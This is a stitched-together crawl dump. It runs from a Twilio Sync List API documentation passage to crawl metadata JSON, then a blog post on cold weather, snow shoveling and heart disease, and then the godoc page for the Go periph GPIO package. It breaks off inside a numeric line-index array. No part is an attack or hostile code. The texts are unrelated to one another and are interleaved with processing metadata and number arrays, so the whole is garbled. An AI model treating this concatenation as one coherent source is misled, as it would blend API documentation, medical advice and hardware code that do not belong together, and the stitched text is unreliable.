get sid_like<IS> Not PII
The SID of the Sync Service with the Sync List resources to read.
Example
Update a List resource
post
https://sync.twilio.com/v1/Services/{ServiceSid}/Lists/{Sid}
Parameters
Names in REST API format
service_sid
Path
post sid_like<IS> Not PII
The SID of the Sync Service with the Sync List resource to update.
sid
Path
post sid_like<ES> Not PII
The SID of the Sync List resource to update.
ttl
Optional
post integer Not PII
An alias for collection_ttl. If both are provided, this value is ignored.
collection_ttl
Optional
post integer Not PII
How long, in seconds, before the Sync List expires (time-to-live) and is deleted. Can be an integer from 0 to 31,536,000 (1 year). The default value is 0, which means the Sync List does not expire. The Sync List will be deleted automatically after it expires, but there can be a delay between the expiration time and the resources's deletion.
Example
Delete a List resource
delete
https://sync.twilio.com/v1/Services/{ServiceSid}/Lists/{Sid}
Permanently delete a List along with all items belonging to it.
Parameters
Names in REST API format
service_sid
Path
delete sid_like<IS> Not PII
The SID of the Sync Service with the Sync List resource to delete.
sid
Path
delete sid_like<ES> Not PII
The SID of the Sync List resource to delete.
Example
Rate this page:
Need some help?
We all do sometimes; code is hard. Get help now from our support team, or lean on the wisdom of the crowd browsing the Twilio tag on Stack Overflow.
|
{
"url": "https://www.twilio.com/docs/sync/api/list-resource",
"source_domain": "www.twilio.com",
"snapshot_id": "crawl=CC-MAIN-2020-10",
"warc_metadata": {
"Content-Length": "239832",
"Content-Type": "application/http; msgtype=response",
"WARC-Block-Digest": "sha1:UDTW3C4HDMLTGBQNQXV5KVIPROSR2NQP",
"WARC-Concurrent-To": "<urn:uuid:7d43b715-5c76-40a6-95d8-e801c424f1c1>",
"WARC-Date": "2020-02-16T20:12:02Z",
"WARC-IP-Address": "99.84.178.29",
"WARC-Identified-Payload-Type": "text/html",
"WARC-Payload-Digest": "sha1:P57WKUFQ67OGMLIQZX4OTR3C3YXPEXQJ",
"WARC-Record-ID": "<urn:uuid:552a92ee-f32d-46f3-9d49-3ed95aa7779b>",
"WARC-Target-URI": "https://www.twilio.com/docs/sync/api/list-resource",
"WARC-Truncated": null,
"WARC-Type": "response",
"WARC-Warcinfo-ID": "<urn:uuid:340c008b-6edd-4131-b0ed-4d40b883c615>"
},
"warc_info": "isPartOf: CC-MAIN-2020-10\r\npublisher: Common Crawl\r\ndescription: Wide crawl of the web for February 2020\r\noperator: Common Crawl Admin ([email protected])\r\nhostname: ip-10-67-67-36.ec2.internal\r\nsoftware: Apache Nutch 1.16 (modified, https://github.com/commoncrawl/nutch/)\r\nrobots: checked via crawler-commons 1.1-SNAPSHOT (https://github.com/crawler-commons/crawler-commons)\r\nformat: WARC File Format 1.1\r\nconformsTo: http://iipc.github.io/warc-specifications/specifications/warc-format/warc-1.1/"
}
|
{
"line_start_idx": [
0,
30,
31,
36,
37,
44,
60,
61,
90,
91,
236,
237,
251,
252,
346,
347,
591,
592,
608,
609,
634,
638,
654,
655,
725,
726,
738,
739,
890,
891,
903,
919,
920,
980,
981,
993,
1009,
1010,
1071,
1072,
1076,
1088,
1089,
1133,
1134,
1140,
1156,
1157,
1203,
1204,
1213,
1228,
1229,
1293,
1294,
1307,
1334,
1335,
1557,
1558,
1571,
1598,
1599,
1684,
1685,
1698,
1725,
1726,
1816,
1817,
1828,
1829,
2041,
2042,
2065,
2066,
2071,
2126,
2137,
2162,
2174,
2179,
2205,
2206,
2266,
2267,
2279,
2288,
2317,
2318,
2577,
2578,
2582,
2591,
2612,
2613,
2684,
2685,
2700,
2709,
2730,
2731,
3074,
3075,
3083,
3092,
3101,
3110,
3119,
3120,
3150,
3151,
3163,
3232,
3251,
3284,
3304,
3317,
3350,
3351,
3425,
3426,
3438,
3451,
3484,
3485,
3537,
3538,
3554,
3569,
3584,
3599,
3614,
3615,
3650,
3651,
3669,
3738,
3763,
3802,
3828,
3847,
3886,
3887,
3967,
3968,
3990,
4011,
4032,
4053,
4074,
4075,
4118,
4119,
4144,
4225,
4256,
4301,
4333,
4358,
4404,
4405,
4492,
4493,
4517,
4542,
4588,
4589,
4654,
4655,
4679,
4708,
4749,
4750,
4844,
4845,
4880,
4909,
4950,
4951,
5314,
5315,
5343,
5370,
5397,
5424,
5451,
5452,
5501,
5502,
5535,
5622,
5623,
5713,
5714,
5751,
5802,
5840,
5871,
5925,
5926,
6019,
6020,
6050,
6081,
6135,
6136,
6207,
6208,
6242,
6275,
6308,
6341,
6374,
6422,
6423,
6471,
6472
],
"line_end_idx": [
30,
31,
36,
37,
44,
60,
61,
90,
91,
236,
237,
251,
252,
346,
347,
591,
592,
608,
609,
634,
638,
654,
655,
725,
726,
738,
739,
890,
891,
903,
919,
920,
980,
981,
993,
1009,
1010,
1071,
1072,
1076,
1088,
1089,
1133,
1134,
1140,
1156,
1157,
1203,
1204,
1213,
1228,
1229,
1293,
1294,
1307,
1334,
1335,
1557,
1558,
1571,
1598,
1599,
1684,
1685,
1698,
1725,
1726,
1816,
1817,
1828,
1829,
2041,
2042,
2065,
2066,
2071,
2126,
2137,
2162,
2174,
2179,
2205,
2206,
2266,
2267,
2279,
2288,
2317,
2318,
2577,
2578,
2582,
2591,
2612,
2613,
2684,
2685,
2700,
2709,
2730,
2731,
3074,
3075,
3083,
3092,
3101,
3110,
3119,
3120,
3150,
3151,
3163,
3232,
3251,
3284,
3304,
3317,
3350,
3351,
3425,
3426,
3438,
3451,
3484,
3485,
3537,
3538,
3554,
3569,
3584,
3599,
3614,
3615,
3650,
3651,
3669,
3738,
3763,
3802,
3828,
3847,
3886,
3887,
3967,
3968,
3990,
4011,
4032,
4053,
4074,
4075,
4118,
4119,
4144,
4225,
4256,
4301,
4333,
4358,
4404,
4405,
4492,
4493,
4517,
4542,
4588,
4589,
4654,
4655,
4679,
4708,
4749,
4750,
4844,
4845,
4880,
4909,
4950,
4951,
5314,
5315,
5343,
5370,
5397,
5424,
5451,
5452,
5501,
5502,
5535,
5622,
5623,
5713,
5714,
5751,
5802,
5840,
5871,
5925,
5926,
6019,
6020,
6050,
6081,
6135,
6136,
6207,
6208,
6242,
6275,
6308,
6341,
6374,
6422,
6423,
6471,
6472,
6652
]
}
|
{
"red_pajama_v2": {
"ccnet_original_length": 6652,
"ccnet_original_nlines": 217,
"rps_doc_curly_bracket": 0.002405290026217699,
"rps_doc_ldnoobw_words": 0,
"rps_doc_lorem_ipsum": 0,
"rps_doc_stop_word_fraction": 0.2918250858783722,
"rps_doc_ut1_blacklist": 0,
"rps_doc_frac_all_caps_words": 0.06749048829078674,
"rps_doc_frac_lines_end_with_ellipsis": 0,
"rps_doc_frac_no_alph_words": 0.17965778708457947,
"rps_doc_frac_unique_words": 0.26354679465293884,
"rps_doc_mean_word_length": 4.85960578918457,
"rps_doc_num_sentences": 59,
"rps_doc_symbol_to_word_ratio": 0,
"rps_doc_unigram_entropy": 4.642258644104004,
"rps_doc_word_count": 812,
"rps_doc_frac_chars_dupe_10grams": 0.3786112368106842,
"rps_doc_frac_chars_dupe_5grams": 0.5337049961090088,
"rps_doc_frac_chars_dupe_6grams": 0.5050684213638306,
"rps_doc_frac_chars_dupe_7grams": 0.4718702435493469,
"rps_doc_frac_chars_dupe_8grams": 0.4718702435493469,
"rps_doc_frac_chars_dupe_9grams": 0.42372021079063416,
"rps_doc_frac_chars_top_2gram": 0.053218450397253036,
"rps_doc_frac_chars_top_3gram": 0.06132793053984642,
"rps_doc_frac_chars_top_4gram": 0.030410539358854294,
"rps_doc_books_importance": -439.3083190917969,
"rps_doc_books_importance_length_correction": -439.3083190917969,
"rps_doc_openwebtext_importance": -285.15264892578125,
"rps_doc_openwebtext_importance_length_correction": -285.15264892578125,
"rps_doc_wikipedia_importance": -284.73431396484375,
"rps_doc_wikipedia_importance_length_correction": -284.73431396484375
},
"fasttext": {
"dclm": 0.048235829919576645,
"english": 0.8155646324157715,
"fineweb_edu_approx": 1.7703782320022583,
"eai_general_math": 0.01417594961822033,
"eai_open_web_math": 0.11522883176803589,
"eai_web_code": 0.49227505922317505
}
}
|
{
"free_decimal_correspondence": {
"primary": {
"code": "005.1",
"labels": {
"level_1": "General works, books and libraries, information sciences",
"level_2": "",
"level_3": "Computer programming"
}
},
"secondary": {
"code": "004.678",
"labels": {
"level_1": "General works, books and libraries, information sciences",
"level_2": "",
"level_3": "Computers and Computer science"
}
}
},
"bloom_cognitive_process": {
"primary": {
"code": "3",
"label": "Apply"
},
"secondary": {
"code": "2",
"label": "Understand"
}
},
"bloom_knowledge_domain": {
"primary": {
"code": "3",
"label": "Procedural"
},
"secondary": {
"code": "2",
"label": "Conceptual"
}
},
"document_type_v1": {
"primary": {
"code": "3",
"label": "Reference/Encyclopedic/Educational"
},
"secondary": {
"code": "4",
"label": "Code/Software"
}
},
"extraction_artifacts": {
"primary": {
"code": "0",
"label": "No Artifacts"
},
"secondary": {
"code": "3",
"label": "Irrelevant Content"
}
},
"missing_content": {
"primary": {
"code": "0",
"label": "No missing content"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"document_type_v2": {
"primary": {
"code": "8",
"label": "Documentation"
},
"secondary": {
"code": "10",
"label": "Knowledge Article"
}
},
"reasoning_depth": {
"primary": {
"code": "2",
"label": "Basic Reasoning"
},
"secondary": {
"code": "3",
"label": "Intermediate Reasoning"
}
},
"technical_correctness": {
"primary": {
"code": "4",
"label": "Highly Correct"
},
"secondary": {
"code": "3",
"label": "Mostly Correct"
}
},
"education_level": {
"primary": {
"code": "3",
"label": "Undergraduate Level"
},
"secondary": {
"code": "4",
"label": "Graduate/Expert Level"
}
}
}
|
71f077df794da2774531b20248bb19b0
|
6,428,015,506,787,465,000
|
Snowstorms and Heart Disease
If you are a heart patient you might be concerned about how the cold weather affects your heart. The body constricts blood flow to the skin to conserve heat, which also raises blood pressure. Many experience angina when active in cold weather.
Advice for how to manage angina related to cold includes:
• Do a warm up indoors to dilate the blood vessels and get heart rate slightly elevated before outdoor exertion
• Create a zone of warmer air to breath by using a scarf, mask or parka
• Avoid large meals and alcohol before exerting outdoors. Blood flow gets diverted and doesn’t go to the heart or exercising muscles instead it works to digest the food.
• Discuss using nitroglycerine before activity with your healthcare practitioner. Using the nitro to dilate the vessels prior to cold air exposure is a method used by some.
Snow Shoveling for Heart Patients
• Warm up, do some light exertion to dilate the blood vessels and get the heart rate slightly elevated before really “digging out”
• Dress appropriately in layers, when you feel warm take layers off. Preventing overheating from being overdressed is as important as dressing for the cold. Your heart works harder to cool your body down. Sweating excessively will lead to being cold later.
• Do not eat a large meal or smoke prior to shoveling, these divert the blood flow away from the heart and exercising muscles.
• Push the snow don’t lift if you can.
• Exhale on Exertion. Breath out when pushing or lifting, don’t hold your breath!!!! Holding breath increases blood pressure even further than the cold and exercise already has.
• Switch sides keep alternating the shovel in left and right hand. The constant twist to one side produces muscle injury and can be hard to distinguish between muscles and heart. Muscle pain can be reproduced with touch or movement, whereas heart pain cannot be reproduced by touch.
• Take breaks, listen to your body don’t over do it. The body constricts blood flow to the skin to conserve heat, which also raises blood pressure.
• Stay fit enough to shovel snow. If you don’t exercise regularly you are not strong enough to shovel wet heavy snow. The cardiovascular demands are even more due to excessive cold temperatures. Train for snow shoveling by performing aerobic exercise and resistance training.
• If you have symptoms STOP
Dealing with Raynauds in the cold weather
Raynaud’s occurs when the fingers and/or toes come into contact with cold. Beta blockers medications actually can aggravate Raynaud’s by leading to increased blood vessel spasm. This class of drugs, used to treat high blood pressure and heart disease, includes metoprolol (Lopressor, Toprol XL), nadolol (Corgard) and propranolol (Inderal, Innopran XL). It is important to cover your feet and hands before they get cold with warm gloves and socks. Make sure they are not too tight allow for circulation. Prevent the symptoms by creating a barrier between your skin and the cold. Even if you are only going out for a short while keep your fingers covered and wear warm foot protection. Frostbite occurs much quicker in persons with Raynaud’s.
.
Atrial Fibrillation is more common in Winter
The likelihood of being admitted to hospital or dying with atrial fibrillation, a life-threatening chaotic heartbeat common among the elderly, increases dramatically during winter months. Atrial Fibrillation is common in persons with heart disease. Be alert for symptoms of irregular heart rhythm, increased shortness of breath, increased fatigue. Additional factors contributing to the winter connection to atrial fibrillation may include drinking too much alcohol which leads to high blood pressure, heart failure, and possibly even stroke due to the atrial fibrillation.
http://www.hearthealthywomen.org/am-i-at-risk/am-i-at-risk/hfother2.html
http://www.nhlbi.nih.gov/health/health-topics/topics/raynaud/
About these ads
One thought on “Snowstorms and Heart Disease
Leave a Reply
Fill in your details below or click an icon to log in:
WordPress.com Logo
You are commenting using your WordPress.com account. Log Out / Change )
Twitter picture
You are commenting using your Twitter account. Log Out / Change )
Facebook photo
You are commenting using your Facebook account. Log Out / Change )
Google+ photo
You are commenting using your Google+ account. Log Out / Change )
Connecting to %s
|
{
"url": "http://rehabilitateyourheart.wordpress.com/2013/02/08/snowstorms-and-heart-disease/",
"source_domain": "rehabilitateyourheart.wordpress.com",
"snapshot_id": "crawl=CC-MAIN-2014-10",
"warc_metadata": {
"Content-Length": "160003",
"Content-Type": "application/http; msgtype=response",
"WARC-Block-Digest": "sha1:UAA3OLHFQAIQVRU5KWTTHSFCBCFTHKJG",
"WARC-Concurrent-To": "<urn:uuid:0bf048bc-d66f-4d46-8a17-66fc439da3ea>",
"WARC-Date": "2014-03-12T19:18:00Z",
"WARC-IP-Address": "192.0.80.250",
"WARC-Identified-Payload-Type": null,
"WARC-Payload-Digest": "sha1:IEUY6Y45UNBISRHO5YFI3OFICE7GSCBO",
"WARC-Record-ID": "<urn:uuid:6afcca47-c886-418c-8a4f-7be600479ffb>",
"WARC-Target-URI": "http://rehabilitateyourheart.wordpress.com/2013/02/08/snowstorms-and-heart-disease/",
"WARC-Truncated": "length",
"WARC-Type": "response",
"WARC-Warcinfo-ID": "<urn:uuid:848558f8-3a10-427b-8b4b-a0e36faad63b>"
},
"warc_info": "robots: classic\r\nhostname: ip-10-183-142-35.ec2.internal\r\nsoftware: Nutch 1.6 (CC)/CC WarcExport 1.0\r\nisPartOf: CC-MAIN-2014-10\r\noperator: CommonCrawl Admin\r\ndescription: Wide crawl of the web with URLs provided by Blekko for March 2014\r\npublisher: CommonCrawl\r\nformat: WARC File Format 1.0\r\nconformsTo: http://bibnum.bnf.fr/WARC/WARC_ISO_28500_version1_latestdraft.pdf"
}
|
{
"line_start_idx": [
0,
29,
30,
31,
276,
277,
335,
336,
450,
524,
696,
871,
872,
906,
907,
1040,
1301,
1430,
1472,
1653,
1938,
2088,
2366,
2396,
2397,
2439,
2440,
3182,
3183,
3185,
3186,
3231,
3232,
3808,
3809,
3882,
3883,
3945,
3946,
3962,
3963,
4008,
4009,
4023,
4024,
4079,
4080,
4099,
4100,
4172,
4173,
4189,
4190,
4256,
4257,
4272,
4273,
4340,
4341,
4355,
4356,
4422,
4423
],
"line_end_idx": [
29,
30,
31,
276,
277,
335,
336,
450,
524,
696,
871,
872,
906,
907,
1040,
1301,
1430,
1472,
1653,
1938,
2088,
2366,
2396,
2397,
2439,
2440,
3182,
3183,
3185,
3186,
3231,
3232,
3808,
3809,
3882,
3883,
3945,
3946,
3962,
3963,
4008,
4009,
4023,
4024,
4079,
4080,
4099,
4100,
4172,
4173,
4189,
4190,
4256,
4257,
4272,
4273,
4340,
4341,
4355,
4356,
4422,
4423,
4439
]
}
|
{
"red_pajama_v2": {
"ccnet_original_length": 4439,
"ccnet_original_nlines": 62,
"rps_doc_curly_bracket": 0,
"rps_doc_ldnoobw_words": 0,
"rps_doc_lorem_ipsum": 0,
"rps_doc_stop_word_fraction": 0.3462897539138794,
"rps_doc_ut1_blacklist": 0,
"rps_doc_frac_all_caps_words": 0.003533570095896721,
"rps_doc_frac_lines_end_with_ellipsis": 0,
"rps_doc_frac_no_alph_words": 0.15312132239341736,
"rps_doc_frac_unique_words": 0.45558738708496094,
"rps_doc_mean_word_length": 5.098854064941406,
"rps_doc_num_sentences": 50,
"rps_doc_symbol_to_word_ratio": 0,
"rps_doc_unigram_entropy": 5.261532783508301,
"rps_doc_word_count": 698,
"rps_doc_frac_chars_dupe_10grams": 0.04327058047056198,
"rps_doc_frac_chars_dupe_5grams": 0.10789547860622406,
"rps_doc_frac_chars_dupe_6grams": 0.0764259621500969,
"rps_doc_frac_chars_dupe_7grams": 0.05956729128956795,
"rps_doc_frac_chars_dupe_8grams": 0.04327058047056198,
"rps_doc_frac_chars_dupe_9grams": 0.04327058047056198,
"rps_doc_frac_chars_top_2gram": 0.011801069602370262,
"rps_doc_frac_chars_top_3gram": 0.01798257976770401,
"rps_doc_frac_chars_top_4gram": 0.023602139204740524,
"rps_doc_books_importance": -341.53009033203125,
"rps_doc_books_importance_length_correction": -341.53009033203125,
"rps_doc_openwebtext_importance": -212.093994140625,
"rps_doc_openwebtext_importance_length_correction": -212.093994140625,
"rps_doc_wikipedia_importance": -154.9569549560547,
"rps_doc_wikipedia_importance_length_correction": -154.9569549560547
},
"fasttext": {
"dclm": 0.24773091077804565,
"english": 0.8791438937187195,
"fineweb_edu_approx": 2.8010637760162354,
"eai_general_math": 0.000013109999599691946,
"eai_open_web_math": 0.20172542333602905,
"eai_web_code": -0.000009780000254977494
}
}
|
{
"free_decimal_correspondence": {
"primary": {
"code": "616.1",
"labels": {
"level_1": "Industrial arts, Technology, and Engineering",
"level_2": "Medicine",
"level_3": "Pathology and Diseases"
}
},
"secondary": {
"code": "613.7",
"labels": {
"level_1": "Industrial arts, Technology, and Engineering",
"level_2": "Medicine",
"level_3": "Health and Hygiene"
}
}
},
"bloom_cognitive_process": {
"primary": {
"code": "3",
"label": "Apply"
},
"secondary": {
"code": "2",
"label": "Understand"
}
},
"bloom_knowledge_domain": {
"primary": {
"code": "3",
"label": "Procedural"
},
"secondary": {
"code": "2",
"label": "Conceptual"
}
},
"document_type_v1": {
"primary": {
"code": "3",
"label": "Reference/Encyclopedic/Educational"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"extraction_artifacts": {
"primary": {
"code": "3",
"label": "Irrelevant Content"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"missing_content": {
"primary": {
"code": "0",
"label": "No missing content"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"document_type_v2": {
"primary": {
"code": "10",
"label": "Knowledge Article"
},
"secondary": {
"code": "21",
"label": "Customer Support"
}
},
"reasoning_depth": {
"primary": {
"code": "2",
"label": "Basic Reasoning"
},
"secondary": {
"code": "3",
"label": "Intermediate Reasoning"
}
},
"technical_correctness": {
"primary": {
"code": "3",
"label": "Mostly Correct"
},
"secondary": {
"code": "4",
"label": "Highly Correct"
}
},
"education_level": {
"primary": {
"code": "1",
"label": "General Audience"
},
"secondary": {
"code": "2",
"label": "High School Level"
}
}
}
|
71f077df794da2774531b20248bb19b0
|
-9,053,051,931,769,591,000
|
periph: periph.io/x/periph/conn/gpio Index | Examples | Files | Directories
package gpio
import "periph.io/x/periph/conn/gpio"
Package gpio defines digital pins.
All GPIO implementations are expected to implement PinIO but the device driver may accept a more specific one like PinIn or PinOut.
Code:
// Make sure periph is initialized.
if _, err := host.Init(); err != nil {
log.Fatal(err)
}
// Use gpioreg GPIO pin registry to find a GPIO pin by name.
p := gpioreg.ByName("GPIO6")
if p == nil {
log.Fatal("Failed to find GPIO6")
}
// A pin can be read, independent of its state; it doesn't matter if it is
// set as input or output.
fmt.Printf("%s is %s\n", p, p.Read())
Index
Examples
Package Files
func.go gpio.go
Constants
const (
// Inputs
IN pin.Func = "IN" // Input
IN_HIGH pin.Func = "In/High" // Read high
IN_LOW pin.Func = "In/Low" // Read low
// Outputs
OUT pin.Func = "OUT" // Output, drive
OUT_OC pin.Func = "OUT_OPEN" // Output, open collector/drain
OUT_HIGH pin.Func = "Out/High" // Drive high
OUT_LOW pin.Func = "Out/Low" // Drive low; open collector low
FLOAT pin.Func = "FLOAT" // Input float or Output open collector high
CLK pin.Func = "CLK" // Clock is a subset of a PWM, with a 50% duty cycle
PWM pin.Func = "PWM" // Pulse Width Modulation, which is a clock with variable duty cycle
)
type Duty Uses
type Duty int32
Duty is the duty cycle for a PWM.
Valid values are between 0 and DutyMax.
const (
// DutyMax is a duty cycle of 100%.
DutyMax Duty = 1 << 24
// DutyHalf is a 50% duty PWM, which boils down to a normal clock.
DutyHalf Duty = DutyMax / 2
)
func ParseDuty Uses
func ParseDuty(s string) (Duty, error)
ParseDuty parses a string and converts it to a Duty value.
Code:
d, err := gpio.ParseDuty("33%")
if err != nil {
log.Fatal(err)
}
fmt.Println(d)
Output:
33%
func (Duty) String Uses
func (d Duty) String() string
func (Duty) Valid Uses
func (d Duty) Valid() bool
Valid returns true if the Duty cycle value is valid.
type Edge Uses
type Edge int
Edge specifies if an input pin should have edge detection enabled.
Only enable it when needed, since this causes system interrupts.
const (
NoEdge Edge = 0
RisingEdge Edge = 1
FallingEdge Edge = 2
BothEdges Edge = 3
)
Acceptable edge detection values.
func (Edge) String Uses
func (i Edge) String() string
type Level Uses
type Level bool
Level is the level of the pin: Low or High.
const (
// Low represents 0v.
Low Level = false
// High represents Vin, generally 3.3v or 5v.
High Level = true
)
func (Level) String Uses
func (l Level) String() string
type PinIO Uses
type PinIO interface {
pin.Pin
// PinIn
In(pull Pull, edge Edge) error
Read() Level
WaitForEdge(timeout time.Duration) bool
Pull() Pull
DefaultPull() Pull
// PinOut
Out(l Level) error
PWM(duty Duty, f physic.Frequency) error
}
PinIO is a GPIO pin that supports both input and output. It matches both interfaces PinIn and PinOut.
A GPIO pin implementing PinIO may fail at either input or output or both.
var INVALID PinIO
INVALID implements PinIO and fails on all access.
type PinIn Uses
type PinIn interface {
pin.Pin
// In setups a pin as an input.
//
// If WaitForEdge() is planned to be called, make sure to use one of the Edge
// value. Otherwise, use NoEdge to not generated unneeded hardware interrupts.
//
// Calling In() will try to empty the accumulated edges but it cannot be 100%
// reliable due to the OS (linux) and its driver. It is possible that on a
// gpio that is as input, doing a quick Out(), In() may return an edge that
// occurred before the Out() call.
In(pull Pull, edge Edge) error
// Read return the current pin level.
//
// Behavior is undefined if In() wasn't used before.
//
// In some rare case, it is possible that Read() fails silently. This happens
// if another process on the host messes up with the pin after In() was
// called. In this case, call In() again.
Read() Level
// WaitForEdge() waits for the next edge or immediately return if an edge
// occurred since the last call.
//
// Only waits for the kind of edge as specified in a previous In() call.
// Behavior is undefined if In() with a value other than NoEdge wasn't called
// before.
//
// Returns true if an edge was detected during or before this call. Return
// false if the timeout occurred or In() was called while waiting, causing the
// function to exit.
//
// Multiple edges may or may not accumulate between two calls to
// WaitForEdge(). The behavior in this case is undefined and is OS driver
// specific.
//
// It is not required to call Read() to reset the edge detection.
//
// Specify -1 to effectively disable timeout.
WaitForEdge(timeout time.Duration) bool
// Pull returns the internal pull resistor if the pin is set as input pin.
//
// Returns PullNoChange if the value cannot be read.
Pull() Pull
// DefaultPull returns the pull that is initialized on CPU/device reset. This
// is useful to determine if the pin is acceptable for operation with
// certain devices.
DefaultPull() Pull
}
PinIn is an input GPIO pin.
It may optionally support internal pull resistor and edge based triggering.
A button is semantically a PinIn. So if you are looking to read from a button, PinIn is the interface you are looking for.
Code:
// Make sure periph is initialized.
if _, err := host.Init(); err != nil {
log.Fatal(err)
}
// Use gpioreg GPIO pin registry to find a GPIO pin by name.
p := gpioreg.ByName("GPIO6")
if p == nil {
log.Fatal("Failed to find GPIO6")
}
// Set it as input, with a pull down (defaults to Low when unconnected) and
// enable rising edge triggering.
if err := p.In(gpio.PullDown, gpio.RisingEdge); err != nil {
log.Fatal(err)
}
fmt.Printf("%s is %s\n", p, p.Read())
// Wait for rising edges (Low -> High) and print when one occur.
for p.WaitForEdge(-1) {
fmt.Printf("%s went %s\n", p, gpio.High)
}
type PinOut Uses
type PinOut interface {
pin.Pin
// Out sets a pin as output if it wasn't already and sets the initial value.
//
// After the initial call to ensure that the pin has been set as output, it
// is generally safe to ignore the error returned.
//
// Out() tries to empty the accumulated edges detected if the gpio was
// previously set as input but this is not 100% guaranteed due to the OS.
Out(l Level) error
// PWM sets the PWM output on supported pins, if the pin has hardware PWM
// support.
//
// To use as a general purpose clock, set duty to DutyHalf. Some pins may
// only support DutyHalf and no other value.
//
// Using 0 as frequency will use the optimal value as supported/preferred by
// the pin.
//
// To use as a servo, see https://en.wikipedia.org/wiki/Servo_control as an
// explanation how to calculate duty.
PWM(duty Duty, f physic.Frequency) error
}
PinOut is an output GPIO pin.
A LED, a buzzer, a servo, are semantically a PinOut. So if you are looking to control these, PinOut is the interface you are looking for.
Code:
// Make sure periph is initialized.
if _, err := host.Init(); err != nil {
log.Fatal(err)
}
// Use gpioreg GPIO pin registry to find a GPIO pin by name.
p := gpioreg.ByName("GPIO6")
if p == nil {
log.Fatal("Failed to find GPIO6")
}
// Set the pin as output High.
if err := p.Out(gpio.High); err != nil {
log.Fatal(err)
}
Code:
// Make sure periph is initialized.
if _, err := host.Init(); err != nil {
log.Fatal(err)
}
// Use gpioreg GPIO pin registry to find a GPIO pin by name.
p := gpioreg.ByName("GPIO6")
if p == nil {
log.Fatal("Failed to find GPIO6")
}
// Generate a 33% duty cycle 10KHz signal.
if err := p.PWM(gpio.DutyMax/3, 10*physic.KiloHertz); err != nil {
log.Fatal(err)
}
type Pull Uses
type Pull uint8
Pull specifies the internal pull-up or pull-down for a pin set as input.
const (
PullNoChange Pull = 0 // Do not change the previous pull resistor setting or an unknown value
Float Pull = 1 // Let the input float
PullDown Pull = 2 // Apply pull-down
PullUp Pull = 3 // Apply pull-up
)
Acceptable pull values.
func (Pull) String Uses
func (i Pull) String() string
type RealPin Uses
type RealPin interface {
Real() PinIO // Real returns the real pin behind an Alias
}
RealPin is implemented by aliased pin and allows the retrieval of the real pin underlying an alias.
Aliases are created by RegisterAlias. Aliases permits presenting a user friendly GPIO pin name while representing the underlying real pin.
The purpose of the RealPin is to be able to cleanly test whether an arbitrary gpio.PinIO returned by ByName is an alias for another pin, and resolve it.
Code:
// Make sure periph is initialized.
if _, err := host.Init(); err != nil {
log.Fatal(err)
}
// Use gpioreg GPIO pin registry to find a GPIO pin by name.
p := gpioreg.ByName("P1_3")
if p == nil {
log.Fatal("Failed to find P1_3")
}
fmt.Printf("P1_3: %s", p)
// Resolve the real underlying pin.
if r, ok := p.(gpio.RealPin); ok {
// On Raspberry Pis, pin #3 on header P1 is an alias for GPIO2.
fmt.Printf("%s is in fact %s", p, r.Real())
} else {
log.Printf("%s is not an alias", p)
}
Directories
PathSynopsis
gpioregPackage gpioreg defines a registry for the known digital pins.
gpiostreamPackage gpiostream defines digital streams.
gpiostream/gpiostreamtestPackage gpiostreamtest enables testing device driver using gpiostream.PinIn or PinOut.
gpiotestPackage gpiotest is meant to be used to test drivers using fake Pins.
Package gpio imports 6 packages (graph) and is imported by 108 packages. Updated 2018-11-21. Refresh now. Tools for package owners.
|
{
"url": "https://godoc.org/periph.io/x/periph/conn/gpio",
"source_domain": "godoc.org",
"snapshot_id": "crawl=CC-MAIN-2018-51",
"warc_metadata": {
"Content-Length": "37067",
"Content-Type": "application/http; msgtype=response",
"WARC-Block-Digest": "sha1:7JKOZPQRLAY3LPLP5BHGCDEHLOLH4IEB",
"WARC-Concurrent-To": "<urn:uuid:55d700e0-e5c3-46ee-90cb-d13364244084>",
"WARC-Date": "2018-12-12T09:23:12Z",
"WARC-IP-Address": "216.239.36.21",
"WARC-Identified-Payload-Type": "text/html",
"WARC-Payload-Digest": "sha1:K6ECR35GG5X45ROMTK3RMWWYHHJFO6DI",
"WARC-Record-ID": "<urn:uuid:7efa9b68-cf13-47cf-90d3-184fd153c1aa>",
"WARC-Target-URI": "https://godoc.org/periph.io/x/periph/conn/gpio",
"WARC-Truncated": null,
"WARC-Type": "response",
"WARC-Warcinfo-ID": "<urn:uuid:300af5df-3ff6-4d15-9dd2-6e25f06d3b5a>"
},
"warc_info": "isPartOf: CC-MAIN-2018-51\r\npublisher: Common Crawl\r\ndescription: Wide crawl of the web for December 2018\r\noperator: Common Crawl Admin ([email protected])\r\nhostname: ip-10-168-82-48.ec2.internal\r\nsoftware: Apache Nutch 1.15 (modified, https://github.com/commoncrawl/nutch/)\r\nrobots: checked via crawler-commons 0.11-SNAPSHOT (https://github.com/crawler-commons/crawler-commons)\r\nformat: WARC File Format 1.1\r\nconformsTo: http://iipc.github.io/warc-specifications/specifications/warc-format/warc-1.1/"
}
|
{
"line_start_idx": [
0,
76,
77,
90,
91,
129,
130,
165,
166,
298,
299,
305,
306,
342,
381,
400,
402,
403,
464,
493,
507,
545,
547,
548,
623,
650,
688,
689,
695,
696,
705,
706,
720,
721,
737,
738,
748,
749,
757,
771,
813,
859,
904,
905,
920,
972,
1039,
1088,
1156,
1157,
1231,
1232,
1310,
1404,
1406,
1407,
1422,
1423,
1439,
1440,
1474,
1475,
1515,
1516,
1524,
1564,
1591,
1662,
1694,
1696,
1697,
1717,
1718,
1757,
1758,
1817,
1818,
1824,
1825,
1857,
1873,
1892,
1894,
1909,
1910,
1918,
1919,
1923,
1924,
1948,
1949,
1979,
1980,
2003,
2004,
2031,
2032,
2085,
2086,
2101,
2102,
2116,
2117,
2184,
2185,
2250,
2251,
2259,
2284,
2309,
2334,
2359,
2361,
2362,
2396,
2397,
2421,
2422,
2452,
2453,
2469,
2470,
2486,
2487,
2531,
2532,
2540,
2566,
2588,
2638,
2660,
2662,
2663,
2688,
2689,
2720,
2721,
2737,
2738,
2761,
2773,
2786,
2821,
2838,
2882,
2898,
2921,
2935,
2958,
3003,
3005,
3006,
3108,
3109,
3183,
3184,
3202,
3203,
3253,
3254,
3270,
3271,
3294,
3306,
3342,
3349,
3431,
3514,
3521,
3603,
3682,
3762,
3801,
3836,
3878,
3885,
3942,
3949,
4031,
4107,
4153,
4170,
4248,
4285,
4292,
4369,
4451,
4466,
4473,
4552,
4635,
4660,
4667,
4736,
4814,
4831,
4838,
4908,
4915,
4965,
5009,
5088,
5095,
5152,
5168,
5250,
5324,
